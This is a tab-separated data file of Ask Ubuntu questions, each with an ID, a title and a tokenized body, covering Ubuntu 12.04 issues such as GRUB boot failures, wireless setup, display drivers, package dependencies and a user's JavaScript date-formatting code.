143963	reading from a text file and executing contents in terminal	lets say i wanted to create a .txt file that had some commands in it . then from .txt file the contents are extracted to the terminal . is this even possible and does it have to be a .txt file ? oh and i am running 12.04
143964	disable 'type your command` prompt on pressing alt	i just installed ubuntu 12.04 and noticed the little prompt that appears on top of every window when you press the alt key : does anyone know how to disable/remove it ? it 's really intrusive in my opinion and i would like to get rid of it .
143973	problem in update installation	i 've 229 mb of updates to be installed in my ubuntu 10.04 and i 'm facing problem in installing them . the problem is that when i try to install them a message appears on the screen saying that it requires the installation from untrusted sources and update is aborted .
143975	what do i do if grub sometimes freezes and/or i get `` ata bus error '' in my logs ?	my machine one day started inconsistently to fail to boot . i found that grub was ( sometimes ) unable to load either the kernel or the ramdisk ( it said `` out of disk '' ) . it got to the point where i could only boot with the grub command line and attempt to load them manually - after serveral failed attempts , it eventually succeeded . in my kernel logs , i found numerous `` ata bus error '' s , and noticed that the disk was operating at ata 33 instead of ata 133 . i did a full check of the disk ( using the vendors bootable tool ) and it came up clean ( despite very large numbers of 'seek errors ' - seems those are normal for my disk ! ) . i wasted a heap of time looking for grub bugs and worrying about hardware failures when eventually i noticed a suggestion to check the cables ... .
143985	how do i manually install the man pages for java jdk system-wide ?	i 'm installing the java jdk manually , by downloading the jdk tar archive from java.com , extracting it into /usr/lib/jvm/jdk1.6.0_32 ( also the openjdk installation location via apt ) , and using update-alternatives to add all the java binaries to /usr/bin . i 'd also like to the install the java man pages system-wide in /usr/lib/jvm/jdk1.6.0_32/man/man1 , preferably using that same update-alternatives script , but not sure how . i 've tried soft linking /usr/lib/jvm/jdk1.6.0_32/man/man1 as /usr/share/man/man.java , but no luck , man java does n't work . running man -- update and mandb do n't seem to do anything . anyone know how to manually install man packages ?
143988	how do i bring up my wireless network at boot ?	i am running ubuntu server 12.04 . i have a wireless usb card . when i begin the boot process i see : waiting for network configuration it turns out that the network never comes up . but once i get to the command line , if i type : ifup wlan0 , then i have network access . my /etc/network/interfaces looks like this : # the loopback network interface auto lo iface lo inet loopback # the primary network interface auto wlan0 iface wlan0 inet dhcp wpa-ssid xxxxxxx wpa-psk xxxxxxxx looking in my network-interface-wlan0.log shows : failed to connect to wpa_supplicant - wpa_ctrl_open : read-only file system failed to bring up wlan0 . failed to connect to wpa_supplicant - wpa_ctrl_open : read-only file system ifdown : interface wlan0 not configured i 've looked at other askubuntu.com questions similar to this , but they do n't seem to apply . how can i get my system to network wirelessly at boot ? additional information : i did some poking around . basically once i login i need to do a : ifdown wlan0 because i think that ip thinks that is is up , but in /var/run/network the only thing that is 'up ' is ifup.lo . then i do a 'ifup -a' and then everything works .
143989	3g usb modem not working in 12.04	when i connect my 3g usb modem to my laptop with 12.04 , nothing shows up in network-manager . this modem is working in 11.10 and the modem is shown in network-manager but not in 12.04 ! ! here are the outputs of lsusb and usb-devices on two machines , one with 11.10 and the other with 12.04 : ubuntu-11.10 : $ lsusb bus 002 device 009 : id 1c9e:6061 $ usb-devices t : bus=02 lev=02 prnt=02 port=03 cnt=01 dev # = 9 spd=12 mxch= 0 d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1c9e prodid=6061 rev=00.00 s : manufacturer=3g usb modem 锟达看 s : serialnumber=000000000002 c : # ifs= 4 cfg # = 1 atr=a0 mxpwr=500ma i : if # = 0 alt= 0 # eps= 3 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 1 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 2 alt= 0 # eps= 2 cls=ff ( vend . ) sub=ff prot=ff driver=option i : if # = 3 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver=usb-storage ubuntu-12.04 : $ lsusb bus 002 device 003 : id 1c9e:6061 omega technology wl-72b 3.5g modem $ usb-devices t : bus=02 lev=01 prnt=01 port=01 cnt=01 dev # = 3 spd=12 mxch= 0 d : ver= 1.10 cls=00 ( > ifc ) sub=00 prot=00 mxps=64 # cfgs= 1 p : vendor=1c9e prodid=6061 rev=00.00 s : manufacturer=qualcomm , incorporated s : product=usb mmc storage s : serialnumber=000000000002 c : # ifs= 1 cfg # = 1 atr=c0 mxpwr=100ma i : if # = 0 alt= 0 # eps= 2 cls=08 ( stor . ) sub=06 prot=50 driver= ( none ) as the output of the above commands show , the device is detected as a modem in 11.10 but in 12.04 it is detected as a usb storage ( the device is both a 3g modem and a sd-card usb adapter ) . any help ? !
143990	12.04 freezes due hybrid ssd ?	ubuntu 64bit installation freezes 3-5 times per day on my new desktop comupter . only cold reboot is possible . i suppose the issues is due the ssd hybrid drive ( seagate momentus 7200 fde.2 st950042 ) with 4 gb ssd cache . but i do n't find any log or hint what it might be except the following error : dmesg | grep -i error [ 1.066073 ] pci0000:00 : acpi _osc request failed ( ae_error ) , returned control mask : 0x1d [ 1.739775 ] acpi error : [ dssp ] namespace lookup failure , ae_not_found ( 20110623/psargs-359 ) [ 1.739783 ] acpi error : method parse/execution failed [ \_sb_.pci0.sat0.spt1._gtf ] ( node ffff880211076000 ) , ae_not_found ( 20110623/psparse-536 ) [ 1.742334 ] acpi error : [ dssp ] namespace lookup failure , ae_not_found ( 20110623/psargs-359 ) [ 1.742343 ] acpi error : method parse/execution failed [ \_sb_.pci0.sat0.spt1._gtf ] ( node ffff880211076000 ) , ae_not_found ( 20110623/psparse-536 ) [ 1.743891 ] acpi error : [ dssp ] namespace lookup failure , ae_not_found ( 20110623/psargs-359 ) [ 1.743894 ] acpi error : method parse/execution failed [ \_sb_.pci0.sat0.spt2._gtf ] ( node ffff880211076078 ) , ae_not_found ( 20110623/psparse-536 ) [ 1.744792 ] acpi error : [ dssp ] namespace lookup failure , ae_not_found ( 20110623/psargs-359 ) [ 1.744796 ] acpi error : method parse/execution failed [ \_sb_.pci0.sat0.spt2._gtf ] ( node ffff880211076078 ) , ae_not_found ( 20110623/psparse-536 ) [ 9.442399 ] ext4-fs ( sda1 ) : re-mounted . opts : errors=remount-ro
143997	ubuntu does not login	i have installed ( via terminal ) these packages ( because my gvim had a warning about libgail ) : libgail-3-0 libevince3-3 libwebkitgtk-3.0-0 nautilus ( i wanted to re-install the first package , when removing it ubuntu forced to remove the other 3 , then i installed all them again ) after reboot , i ca n't login ( after entering the password the screen refreshes again i enter the password and it hangs ) can i solve the problem ( s ) with live cd without erasing all my data and install everything again ?
144003	how can i watch netflix or lovefilm .com on ubuntu	i have installed moonlight in me firefox but netflix still dont work what is the solution t this please as i love watching movies .
144006	java script is not working in ubuntu firefox	my asp application is running perfect in windows ie , but when i run on ubuntu firefox javascript is not working properly.. below is my java script code ... .. and i am calling this java script on onfocus and onblur event . when onblur is fired from date format 1 digit is removing in ubuntu firefox . please somebody help . function dateformat ( vdatename , vdatevalue , e , datecheck , datetype ) { vdatetype = datetype ; // vdatename = object name // vdatevalue = value in the field being checked // e = event // datecheck // true = verify that the vdatevalue is a valid date // false = format values being entered into vdatevalue only // vdatetype // 1 = mm/dd/yyyy // 2 = yyyy/mm/dd // 3 = dd/mm/yyyy //enter a tilde sign for the first number and you can check the variable information . if ( vdatevalue == `` ~ '' ) { alert ( `` appversion = `` +navigator.appversion+ '' \nnav . 4 version = `` +isnav4+ '' \nnav . 5 version = `` +isnav5+ '' \nie version = `` +isie4+ '' \nyear type = `` +vyeartype+ '' \ndate type = `` +vdatetype+ '' \nseparator = `` +strseperator ) ; vdatename.value = `` '' ; vdatename.focus ( ) ; return true ; } var whichcode = ( window.event ) ? e.which : e.keycode ; // check to see if a seperator is already present . // bypass the date if a seperator is present and the length greater than 8 if ( vdatevalue.length > 8 & & isnav4 ) { if ( ( vdatevalue.indexof ( `` - '' ) > = 1 ) || ( vdatevalue.indexof ( `` / '' ) > = 1 ) ) return true ; } //eliminate all the ascii codes that are not valid var alphacheck = `` abcdefghijklmnopqrstuvwxyzabcdefghijklmnopqrstuvwxyz/- '' ; if ( alphacheck.indexof ( vdatevalue ) > = 1 ) { if ( isnav4 ) { vdatename.value = `` '' ; vdatename.focus ( ) ; vdatename.select ( ) ; return false ; } else { vdatename.value = vdatename.value.substr ( 0 , ( vdatevalue.length-1 ) ) ; return false ; } } if ( whichcode == 8 ) //ignore the netscape value for backspace . ie has no value return false ; else { //create numeric string values for 0123456789/ //the codes provided include both keyboard and keypad values var strcheck = '47,48,49,50,51,52,53,54,55,56,57,58,59,95,96,97,98,99,100,101,102,103,104,105 ' ; if ( strcheck.indexof ( whichcode ) ! = -1 ) { if ( isnav4 ) { if ( ( ( vdatevalue.length =1 ) ) { alert ( `` invalid date\nplease re-enter '' ) ; vdatename.value = `` '' ; vdatename.focus ( ) ; vdatename.select ( ) ; return false ; } if ( vdatevalue.length == 6 & & datecheck ) { var mday = vdatename.value.substr ( 2,2 ) ; var mmonth = vdatename.value.substr ( 0,2 ) ; var myear = vdatename.value.substr ( 4,4 ) //turn a two digit year into a 4 digit year if ( myear.length == 2 & & vyeartype == 4 ) { var mtoday = new date ( ) ; //if the year is greater than 30 years from now use 19 , otherwise use 20 var checkyear = mtoday.getfullyear ( ) + 30 ; var mcheckyear = '20 ' + myear ; if ( mcheckyear > = checkyear ) myear = '19 ' + myear ; else myear = '20 ' + myear ; } var vdatevaluecheck = mmonth+strseperator+mday+strseperator+myear ; if ( ! datevalid ( vdatevaluecheck ) ) { alert ( `` invalid date\nplease re-enter '' ) ; vdatename.value = `` '' ; vdatename.focus ( ) ; vdatename.select ( ) ; return false ; } return true ; } else { // reformat the date for validation and set date type to a 1 if ( vdatevalue.length > = 8 & & datecheck ) { if ( vdatetype == 1 ) // mmddyyyy { var mday = vdatename.value.substr ( 2,2 ) ; var mmonth = vdatename.value.substr ( 0,2 ) ; var myear = vdatename.value.substr ( 4,4 ) vdatename.value = mmonth+strseperator+mday+strseperator+myear ; } if ( vdatetype == 2 ) // yyyymmdd { var myear = vdatename.value.substr ( 0,4 ) var mmonth = vdatename.value.substr ( 4,2 ) ; var mday = vdatename.value.substr ( 6,2 ) ; vdatename.value = myear+strseperator+mmonth+strseperator+mday ; } if ( vdatetype == 3 ) // ddmmyyyy { var mmonth = vdatename.value.substr ( 2,2 ) ; var mday = vdatename.value.substr ( 0,2 ) ; var myear = vdatename.value.substr ( 4,4 ) vdatename.value = mday+strseperator+mmonth+strseperator+myear ; } //create a temporary variable for storing the datetype and change //the datetype to a 1 for validation . var vdatetypetemp = vdatetype ; vdatetype = 1 ; var vdatevaluecheck = mmonth+strseperator+mday+strseperator+myear ; if ( ! datevalid ( vdatevaluecheck ) ) { alert ( `` invalid date\nplease re-enter '' ) ; vdatetype = vdatetypetemp ; vdatename.value = `` '' ; vdatename.focus ( ) ; vdatename.select ( ) ; return false ; } vdatetype = vdatetypetemp ; return true ; } else { if ( ( ( vdatevalue.length =1 ) ) { alert ( `` invalid date\nplease re-enter '' ) ; vdatename.value = `` '' ; vdatename.focus ( ) ; vdatename.select ( ) ; return false ; } } } } else { // non isnav check if ( ( ( vdatevalue.length =1 ) ) { alert ( `` invalid date\nplease re-enter '' ) ; vdatename.value = `` '' ; vdatename.focus ( ) ; return true ; } // reformat date to format that can be validated . mm/dd/yyyy if ( vdatevalue.length > = 8 & & datecheck ) { // additional date formats can be entered here and parsed out to // a valid date format that the validation routine will recognize . if ( vdatetype == 1 ) // mm/dd/yyyy { var mmonth = vdatename.value.substr ( 0,2 ) ; var mday = vdatename.value.substr ( 3,2 ) ; var myear = vdatename.value.substr ( 6,4 ) } if ( vdatetype == 2 ) // yyyy/mm/dd { var myear = vdatename.value.substr ( 0,4 ) var mmonth = vdatename.value.substr ( 5,2 ) ; var mday = vdatename.value.substr ( 8,2 ) ; } if ( vdatetype == 3 ) // dd/mm/yyyy { var mday = vdatename.value.substr ( 0,2 ) ; var mmonth = vdatename.value.substr ( 3,2 ) ; var myear = vdatename.value.substr ( 6,4 ) } if ( vyearlength == 4 ) { if ( myear.length = checkyear ) myear = '19 ' + myear ; else myear = '20 ' + myear ; vdatevaluecheck = mmonth+strseperator+mday+strseperator+myear ; // store the new value back to the field . this function will // not work with date type of 2 since the year is entered first . if ( vdatetypetemp == 1 ) // mm/dd/yyyy vdatename.value = mmonth+strseperator+mday+strseperator+myear ; if ( vdatetypetemp == 3 ) // dd/mm/yyyy vdatename.value = mday+strseperator+mmonth+strseperator+myear ; } if ( ! datevalid ( vdatevaluecheck ) ) { alert ( `` invalid date\nplease re-enter '' ) ; vdatetype = vdatetypetemp ; vdatename.value = `` '' ; vdatename.focus ( ) ; return true ; } vdatetype = vdatetypetemp ; return true ; } else { if ( vdatetype == 1 ) { if ( vdatevalue.length == 2 ) { vdatename.value = vdatevalue+strseperator ; } if ( vdatevalue.length == 5 ) { vdatename.value = vdatevalue+strseperator ; } } if ( vdatetype == 2 ) { if ( vdatevalue.length == 4 ) { vdatename.value = vdatevalue+strseperator ; } if ( vdatevalue.length == 7 ) { vdatename.value = vdatevalue+strseperator ; } } if ( vdatetype == 3 ) { if ( vdatevalue.length == 2 ) { vdatename.value = vdatevalue+strseperator ; } if ( vdatevalue.length == 5 ) { vdatename.value = vdatevalue+strseperator ; } } return true ; } } if ( vdatevalue.length == 10 & & datecheck ) { if ( ! datevalid ( vdatename ) ) { // un-comment the next line of code for debugging the datevalid ( ) function error messages // alert ( err ) ; alert ( `` invalid date\nplease re-enter '' ) ; vdatename.focus ( ) ; vdatename.select ( ) ; } } return false ; } else { // if the value is not in the string return the string minus the last // key entered . if ( isnav4 ) { vdatename.value = `` '' ; vdatename.focus ( ) ; vdatename.select ( ) ; return false ; } else { vdatename.value = vdatename.value.substr ( 0 , ( vdatevalue.length-1 ) ) ; return false ; } } } }
144008	why does my windows xp/ubuntu dual boot not let me select an operating system ?	i recently installed a second hard drive on a windows xp computer . i installed ubuntu 12.04 from dvd-rom onto the second drive , using the installer to partition . when i start the computer , i do not get the option to choose the operating system , and windows shows the drive ( f : ) as not having any linux files . what is my next step ?
144013	installed entire font family , but only one appears	i recently installed an entire family of fonts ( gill sans for those interested ) on my computer . when i open up openoffice to use them , however , i saw that in the drop-down font menu i only get to see gill sans std , and unfortunately when i try and use that , it 's actually gill sans outline . i ca n't see a way to choose between different fonts in a font family in openoffice - is there one ? i tried to use the fonts in gedit and could confirm that each individual font is present and usable . anyone have any ideas ?
144014	mouse randomly selects and clicks in wrong location , can not open files/folders	my problem is a bit like the issue given here : mouse selects everything on its own except it occurs in both gnome 3 and unity . it does n't happen in all applications though . so far i 've observed it primarily in matlab ( r2012a ) , nautilus , chromium and the gnome and/or unity dialog boxes . essentially i 'll go to click something ( like to go to a certain location in the matlab editor , or to click a button on a system dialog box ) and instead of clicking where i pointed , the click is performed somewhere else , perhaps opening another menu or even selecting a large chunk of text in an arbitrary part of the screen . furthermore , nautilus recognizes left and right clicks but never at the location i actually clicked . however , dragging works . it happens whether i am using the touchscreen ( hp tx2 ) or a wireless mouse , or the touchpad . i am on ubuntu 12.04 , and i have also uninstalled compiz to no effect . if i reboot the problem sometimes disappears , but it either comes back after a few minutes or if i suspend and resume .
144018	mouse gestures for unity desktop	i liked the mouse gesture of windows 7 to minimize all open windows except the active one . can i have that kind of gestures to use in unity . or what are the mouse gestures available for unity ?
144023	why does ubuntu occasionally not start ?	why is it happening that sometimes , for apparently no reason , ubuntu refuses to start , and only rarely it does ? sometimes , ubuntu simply does n't start ! after i select ubuntu in the pink screen , it shows a black one where nothing appears and a `` _ '' blinks on the top-left corner . also , sometimes ( everytime the netbook is not connected to the power ) it shows a lot of text on this black screen like when it is loading but then the screen gets all weird full of dots and senseless things everywhere ( it 's not text ) and then frezes ... looks like my mega drive when it `` tilts '' : s why does this happen ? how can i fix it ?
144024	how do i change my 1080p external monitor from portrait to landscape on an eee pc 1000h ?	hi i have an eeepc 1000h netbook with a samsung t22a350 1080p 22 '' external monitor . i 've just installed ubuntu 12.04 and i mainly use the external display but when i select 1080 from the dropdown list , my only options are for a rotated portrait . my neck 's non too supple , so tilting my head for extended periods is not really viable . : - ) any ideas on making ubuntu display 1080 normal landscape ? it must be possible as using a gparted boot cd does it perfectly . any help greatly appreciated . cheers !
144026	after upgrade to 12.04 network manager does n't work at all	i find in syslog some messages '' network manager ( pid ) terminated with status 1 '' if i try to run networkmanager manually i get '' failed to read classid fil : object not found '' in 11.10 it was working with cable with wi-fi and with 3g usb key what would be the workaround considering that the notebook is unable to connect to any network ?
144028	what is the keyboard shortcut to switch to applications tab in gnome3 ?	what is the keyboard shortcut to switch to applications tab in gnome3 dash ? the gnome dash which comes up when we press windows meta key / super key . i want to minimize the keyboard use . also how can i switch back to windows tab again using keyboard shortcut ?
144035	nvidia geforce 8600 gt hdmi no audio ?	i ca n't get audio working using a hdmi cable with my nvidia geforce 8600 gt card .
144036	ca n't get netbeans to stay locked to launcher ?	i 've installed netbeans [ for php ] which has appeared in a directory in my home folder . to launch the program i keep having to navigate to /home//netbeans-7.1.2/bin/ to run the launcher . once it 's running , if i right-click the icon in the launcher list and click 'lock to launcher ' , next time i startup it 's gone . how can i make it stay there so i do n't have to run it from netbeans ' bin directory every time ?
144037	pc does n't boot and shows `` no init found ''	when i turn on my pc , it says : case 1 busybox v1.17.1 ( ubuntu 1:1.17.1-10 ubuntu1 ) buil-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ case 2 in recovery mode , it says : 706-4e 6e-9416-17889748 bbd onb /root failed : input/output error begin : running/scripts/local booting ... done done . begin : running/scripts/local booting ... mount : mounting/dev on /root/dev failed : no such file or directory done . mount : mounting/sys on /root/sys failed : no such file or directory mount : mounting/proc on /root/proc failed : no such file or directory target filesystem does n't have a requested /sbin/init . no init found . try passing init=bootarg . busybox v1.17.1 ( ubuntu 1:1.17.1-10 ubuntu1 ) buil-in shell ( ash ) enter 'help ' for a list of built-in commands . ( initramfs ) _ [ 34.664739 ] atkbd serio0 : unknown key pressed ( translated set2 , code 0xd9 on isa0060/serio0 ) ... .
144047	dependencyproblems libdirectfb-extra	i want to install openssh-server , so i do this : erik @ workstationubuntu : ~ $ sudo apt-get install openssh-server reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : dassault-systemes-draftsight : i386 : predepends : libdirectfb-extra : i386 ( > = 1.2.7-2 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . erik @ workstationubuntu : ~ $ sudo apt-get -f install reading package lists ... done building dependency tree reading state information ... done correcting dependencies ... done the following packages will be removed : dassault-systemes-draftsight : i386 0 upgraded , 0 newly installed , 1 to remove and 1 not upgraded . after this operation , 297 mb disk space will be freed . do you want to continue [ y/n ] ? n erik @ workstationubuntu : ~ $ sudo apt-get install libdirectfb-extra : i386 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : libdirectfb-extra : i386 : depends : libdirectfb-1.2-9 : i386 ( = 1.2.10.0-4.3ubuntu1 ) but it is not going to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . erik @ workstationubuntu : ~ $ erik @ workstationubuntu : ~ $ sudo apt-get install libdirectfb-1.2-9 : i386 reading package lists ... done building dependency tree reading state information ... done you might want to run 'apt-get -f install ' to correct these : the following packages have unmet dependencies : dassault-systemes-draftsight : i386 : predepends : libdirectfb-extra : i386 ( > = 1.2.7-2 ) but it is not going to be installed libdirectfb-1.2-9 : conflicts : libdirectfb-1.2-9 : i386 but 1.2.10.0-4.3ubuntu1 is to be installed libdirectfb-1.2-9 : i386 : depends : libsysfs2 : i386 but it is not going to be installed depends : libts-0.0-0 : i386 ( > = 1.0 ) but it is not going to be installed conflicts : libdirectfb-1.2-9 but 1.2.10.0-4.3ubuntu1 is to be installed e : unmet dependencies . try 'apt-get -f install ' with no packages ( or specify a solution ) . erik @ workstationubuntu : ~ $ and this goes on ! can i some install openssh-server without removing draftsight ? ( note that i had to use dpkg -- force-depends when installing draftsight ( it works flawless )
144049	black login screen after installing updates 12.04	i love my lixux 12.04..till yesterday it installed new updates and i clicked on restart.. as system went to grub all normal & loaded normal..then instead of pretty desktop ( auto login turned on ) i have black screen asking for login and password.. why ? how i get my desktop back to before ? please help new noob ! ! ! this is due to updates i am sure , nothing in hardware has changed and no other display settings changed.. using amd diver from there site linux one for my raedeon 6850 and have catalyst driver working fine.. i have tried typing in weird commands but they didnt do much like sudo start lightdm and sudo startx .. didnt do anything just froze.. i dont exactly no what these commands do but something to do with black screen..so i thought id try it.. thanks
144052	how to file a bug report for a specific ubuntu release ?	i imagine if i want a package updated in an lts , such as 12.04 , it has be for a very good reason . the actual package i am interested in is picolisp : it has a ( probably also affecting security ! ) bug which is fixed in picolisp upstream . how should the bug be filed to get attention for not only 12.10 but also 12.04 ? should the fix be a minimal patch to only fix the crash and security issue , or should the fix be an outright upgrade to picolisp latest upstream ? i have read the bug report faq but could only find very general advice on how to file bug reports , more aimed at and users than people with knowledge about the actual packages . https : //bugs.launchpad.net/ubuntu/+source/picolisp/+bug/956731
144063	how do i install in expert mode on an old 512mb laptop and wireless problem	intial screen in 12.04lts live dvd help reference f7 & f8 menu options that are not there . during install i guess it could n't find the drivers for the linksys wpc54g ver 3 pcmcia card and sent me to a site `` http : //wireless.kernal.org/en/users/b43 # devicefirmware '' that now is some sort of religious site . trying to install on old dell c800s with 512mb ram to give to some underprivileged kids . question is , am i wasting my time on what i thought by now to be a tried operating system ? have tried turning off pcmcia during install as one place suggested , but now that i know it sees the wireless card , assume that is not why i always get a `` critical error , install can not continue '' also wondering at the online help always referencing floppy disks and then there 's the install in expert mode , that might give me some more control and ability to figure out what is going wrong , but it never tell you how to do start the install in that mode .
144064	set server timezone but not working with crontab and phpmyadmin	timezone is not working properly i am using linode server running ubuntu 12.04lts . my question is when i configured timezone by using dpkg reconfigure tz as ist asia/calcutta . it shows correct timezone by using date command . but it is not working in cron jobs and phpmyadmin . because my work is very important , anxiously i have to work in utc timezone to run my cron jobs accordingly . but now i am stucking with my applications output run by cron jobs . please help me ! ! thanks in advance
144070	12.04 is it possible to change `` home '' icon on the launcher ?	is there a way to change the home icon without changing folder icon ?
144078	store home partition on and authenticate users with central server ?	i am planning to roll out a handful of ubuntu workstations . we have a debian ( samba ) fileserver . i would like to offer a hot-desk situation whereby users could go to any of these ubuntu machines , log on with their username , and pickup their desktop environment . the server is not high spec ; i want programs to run on the desktops , not virtualised on the server or anything like that . is this a straight forward thing to do ? what technologies or options do i have ?
144081	problem installing ubuntu	while i was trying to install ubuntu 12.04 alongside windows 7 on a seperate partiton on my pc , the ubuntu installation failed ; now i ca n't boot into windows 7 anymore . when i inserted the hard disk into an external source to read its contents , i found about 6 partitons present there , while there were only 3 before . i saw that it has copied some linux files to one of the partitons . what do i do now to be able to at least boot my windows 7 ?
144085	resize images to specific height value in imagemagick ?	i 've looked around for this , and ca n't find an easily implemented solution . currently i 'm working on an application that deals with panoramas . as they come out of the batch stitch process , the dimensions average 18000x4000 . using imagemagick , how can i downscale those images to a specific height value while maintaining aspect ratio ? according to the manual , the convert operation takes in both height and width to resize to while maintaining the same aspect ratio . what i 'd like is to put in 600 and 1000 in my existing resize script function and have both a regular viewable image as well as a reduced size .
144087	system-wide smoothing is off , but evince smooths anyway	i managed to turn of smoothing system-wide in ubuntu ( see screenshot ) including font in applications . however , evince ( and other pdf readers ) does not respect smoothing turned off and smooths text in pdf anyway . is there way to make evince use unsmoothed text ?
144088	how to load edid firmware with drm_kms_helper	i 've some screen trouble with my computer , i use it with a kvm switch , but this switch seems to block the edid detection of the screen , and as no screen is detected , after the boot ( when the ubuntu loading logo normally appear ) the screen go sleep mode . but with nomodeset kernel option the vesa driver correctly detects the screen and it works but with limitations ( no hardware acceleration , mouse flickering , no sleep mode ... ) . i 've made many tests ( xrandr , build my own xorg.conf ... ) and i finally found this kernel patch : drm : allow loading an edid as firmware to override broken monitor so i 've tried to compile my own kernel , and i 've seen the ubuntu default kernel already have this patch and configured to be compiled on the kernel . config-3.2.0-24-generic : config_drm_kms_helper=m config_drm_load_edid_firmware=y so i 've make an /etc/modprobe.d/drm-kms-helper.conf that contains : cat /etc/modprobe.d/drm-kms-helper.conf options drm_kms_helper edid_firmware=vga1 : edid/1680x1050.bin but the problem is still there , when i boot the screen go off . even if the configuration still to be applied : cat /sys/module/drm_kms_helper/parameters/edid_firmware vga1 : edid/1680x1050.bin i 've also tried these settings : =vga-1 : edid/1680x1050.bin =edid/1680x1050.bin on the xorg.0.log the system as the same behavior as before : [ 21.832 ] ( ii ) intel ( 0 ) : edid for output vga1 [ 21.837 ] ( ii ) intel ( 0 ) : edid for output hdmi1 [ 21.884 ] ( ii ) intel ( 0 ) : edid for output dp1 [ 22.012 ] ( ii ) intel ( 0 ) : edid for output hdmi2 [ 22.016 ] ( ii ) intel ( 0 ) : edid for output hdmi3 [ 22.064 ] ( ii ) intel ( 0 ) : edid for output dp2 [ 22.112 ] ( ii ) intel ( 0 ) : edid for output dp3 [ 22.112 ] ( ii ) intel ( 0 ) : output vga1 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output hdmi1 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output dp1 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output hdmi2 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output hdmi3 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output dp2 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output dp3 disconnected [ 22.112 ] ( ww ) intel ( 0 ) : no outputs definitely connected , trying again ... [ 22.112 ] ( ii ) intel ( 0 ) : output vga1 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output hdmi1 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output dp1 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output hdmi2 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output hdmi3 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output dp2 disconnected [ 22.112 ] ( ii ) intel ( 0 ) : output dp3 disconnected [ 22.112 ] ( ww ) intel ( 0 ) : unable to find connected outputs - setting 1024x768 initial framebuffer the strange thing is as written in the log , a 1024x768 picture is present but do n't wake up the screen . the only way t see it is to switch with the kvm from an activated computer to this one . for now i do n't know what tracks to follow , i 'm lost . my problem seems to come from hotplug problem . when i disable it , everythings goes well . see here for more details
144092	recover data after badblock -w ?	i have an disk witch windows which would not power on showing me the bsod . i inserted an livecd to see if there where errors no the disk and there where , so i used the badblocks command as seen on a website tutorial . they said to use it with the `` -w '' option , and so i did . the scan finished and some number list appeared . after that i restarted and the computer was not able to find the disk . i inserted the livecd again and looked at gparted and the disk was shown as empty and with no partitions . i 've looked at the man page and seen tha the `` -w '' option deletes all data . is there any way to recoer it ?
144095	grub wo n't boot windows 7 ( after burg was tried )	i have a problem with grub 2. when i hit the windows 7 ( loader ) option on the grub boot screen windows wo n't boot . i get a black screen with a white cursor blinking ... here is a log of my boot options . i just want to delete all the other partitions which i do n't know how they 've been made and stay just with the ubuntu ext4 partition , the swap partition and the windows 7 partition . can someoune help me with my problem ? here is the log : http : //paste.ubuntu.com/1014619/ ps : i can only boot windows with hiren 's boot cd with the first option , boot form first hard drive ( win7 , xp , vista ) .
144104	how can i access a program from server through firefox browser ?	i want to access a program on server across my network . the program should be accessible through firebox on a client machine but i do n't seem to be able to point to the server correctly . any help appreciated . the program is oscaremr12
144111	uninstalling ubuntu header	after updating ubuntu to the latest version 12.04 i found ubuntu corrupted after two days . i tried uninstalling but it would n't and gave me errors . i uninstalled using revo uninstaller . now i am unable to install . i understand that the problem could be an ubuntu header during boot which still shows but is of no use . how do i remove the header ? any solutions ?
144115	how do you reduce the timeout for grub2 from 10 to 0 seconds ?	i installed ubuntu 12.04 lts , with my mac os . when i select ubuntu to boot , this waits 10 seconds for my input , unfortunately my keyboard does not respond at this stage . how can i reduce that 10 seconds to zero seconds ? ( i tried to edit /boot/grub/grub.cfg , but permission is denied to save changes )
144117	what is the philosophy behind unity 's name	the question is why unity is named as `` unity '' ? . or is there any philosophy behind unity 's name or it is just a normal naming ?
144122	when should .mo files be generated ?	i am creating a python gtk3 program . i 'll like to add translation support . i know how to create a .pot and .po file . however in order to make the application available in multiple languages , i need to generate .mo files . i read here that the way to generate .mo files is using the msgfmt.make command . my question is whether i ( the developer ) should generate the .mo files manually in my computer and then instruct the .deb installer to move the files into the usr/share/locale/en_gb/ folder when it is being installed ? or should the .deb installer generate these .mo files while the user installs my program on his system ? in way this could be summarized as `` are the .mo files machine dependant ? '' my folder structure is as follow nstrain-0.1 /debian /data /help /nstrain_lib nstrain.desktop nstrain.py where nstrain.py is the main executable file which the .desktop file runs when the user clicks on my program .
144125	how to configure pagavcs ( svn client ) for google code repository	i want to configure pagavcs for google code repo . how do i add user name password and create commits to the google repo using the client . any help is appreciated .
144131	ubuntu hanging on shutdown	i have a toshiba satellite e205 dual booting ubuntu and windows 7 . i just upgraded to 12.04 and i 've been having an issue with the os hanging on shutdown . it will close all the windows and go to the splash screen and then hang there indefinitely . at first i thought the problem was related to dropbox - if i turned dropbox off or did n't connect to the internet it would shut down fine . i uninstalled dropbox and that helped , but it still will occasionally exhibits the same problem . it seems anecdotally as if the longer i have the computer running the more likely it is to fail on shut-down . any ideas on what might be happening or how to troubleshoot would be great . thanks !
144140	my unity desktop broken because of myunity	i 've just installed myunity in ubuntu 12.04 and changed the system font style but suddenly it crashed . i tried to boot it again but it crash again and again . so i log in via guest and remove myunity from software center but when i tried to log in via admin user , it crashed again ! how do i solve this problem ?
